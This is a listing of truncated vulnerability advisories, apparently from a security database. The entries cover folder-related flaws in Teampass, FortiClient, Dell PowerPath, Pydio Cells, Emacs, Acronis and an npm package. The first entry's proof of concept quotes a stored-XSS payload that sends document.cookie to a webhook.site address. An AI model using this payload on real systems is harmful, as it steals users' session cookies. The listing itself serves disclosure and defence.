XSS Filter Bypass in Folder Name leading to Information Disclosure

Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

HTML Injection

teampass password manager is vulnerable to HTML injection .The vulnerability is due to lack of user input sanitisation while renaming a folder with user supplied folder name resulting in running malicious html when the same folder is accessed by other users including admin...

FortiClient (Windows) / FortiConverter (Windows) - Insecure Installation Folder

An incorrect default permissions CWE-276 vulnerability in FortiClient Windows and FortiConverter Windows may allow a local authenticated attacker to tamper with files in the installation folder, if FortiClient or FortiConvreter is installed in an insecure folder...

CVE-2023-32750

Pydio Cells through 4.1.2 allows SSRF. For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job "remote-download" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The...

Magento eCommerce 2.4.0 Information Disclosure

==================================================================================================================================== | Title : Magento eCommerce v 2.4.0 sensitive information disclosure Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser :...

emacs: command injection vulnerability in htmlfontify.el

A flaw was found in the Emacs package. If a file name or directory name contains shell metacharacters, arbitrary code may be executed...

HTML Injection in Folder Name

Description The folder name does not sanitize folder name and due to missing output encoding, HTML user-input is rendered in the webpage during folder deletion. Proof of Concept 1. Login to Teampass as any user. 2. Go to Folders tab. 3. Create a new folder with HTML tag in the Label. Example: HTM...

WordPress WPtouch Pro 4 Backup Disclosure

==================================================================================================================================== | Title : WordPress - WPtouch Pro 4 Backup Disclosure Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox...

PT-2023-14815 · Syncthing +2 · Syncthing +2

Name of the Vulnerable Software and Affected Versions: Syncthing versions prior to 1.23.5 Description: The issue concerns a stored cross-site scripting attack in Syncthing, an open-source continuous file synchronization program. A compromised instance with shared folders could sync malicious file...

PT-2023-21693 · Unknown · Conprosys Hmi System

Name of the Vulnerable Software and Affected Versions: CONPROSYS HMI System CHS versions prior to 3.5.3 Description: The issue is related to incorrect permission assignment for a critical resource in the CONPROSYS HMI System CHS. The Access Control List ACL is not set correctly for the local fold...

GHSA-H5G9-2P35-54C7 nilsteampassnet/teampass vulnerable to cross-site scripting

Cross-site Scripting XSS - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9. This enables an attacker to inject malicious code into a shared folder, which can then be executed by other users who have access to the folder...

nilsteampassnet/teampass vulnerable to cross-site scripting

Cross-site Scripting XSS - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9. This enables an attacker to inject malicious code into a shared folder, which can then be executed by other users who have access to the folder...

Dell PowerPath Management Appliance Authorization Issues Vulnerability

The Dell PowerPath Management Appliance is a PowerPath host management application from Dell Inc. that offers two models: a virtual machine-based appliance and a Docker containerized appliance. An authorization issue vulnerability exists in Dell PowerPath Management Appliance versions 7.0, 7.1, a...

CVE-2023-28079

PowerPath for Windows, versions 7.0, 7.1 & 7.2 contains Insecure File and Folder Permissions vulnerability. A regular user non-admin can exploit the weak folder and file permissions to escalate privileges and execute arbitrary code in the context of NT AUTHORITY\SYSTEM...

CVE-2023-28079

CVE-2023-28079 concerns Dell’s PowerPath for Windows, affecting versions 7.0, 7.1 and 7.2. The root cause is improper management of file and folder permissions, enabling a non‑administrative user to escalate privileges and execute code with NT AUTHORITY\SYSTEM privileges. The vulnerability is loc...

Partial Local file inclusion

Description An authenticated user can extend the range of the web application's folder context and can dig out to OS level. To reproduce the issue, please authenticate to the web application, and simply open the following URL in the browser:...

Code injection in nilsteampassnet/teampass

nilsteampassnet/teampass prior to 3.0.9 is vulnerable to code injection. A malicious user could potentially rename a folder with a payload containing malicious code. This could result in an attack on an admin who edits the folder, as the payload could execute upon the admin's interaction with the...

PT-2023-3352 · Fortinet · Forticlient +1

Name of the Vulnerable Software and Affected Versions: FortiClient versions 7.0.0 through 7.0.6 FortiClient versions 6.4.0 through 6.4.8 FortiClient version 6.0.0 FortiConverter versions 6.2.0 through 6.2.1 FortiConverter version 7.0.0 FortiConverter version 6.0.0 Description: The issue is relate...

Malicious code in docs-component-folder-selector (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 029903e7351485fc54de0e50d6f2f3c9c822895bd8d97930476b5a69f23dd6f9 The OpenSSF Package Analysis project identified 'docs-component-folder-selector' @ 1.0.6 npm as malicious. It is considered malicious because: -...

CVE-2022-45452

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Agent Windows before build 30430, Acronis Cyber Protect 15 Windows before build 30984...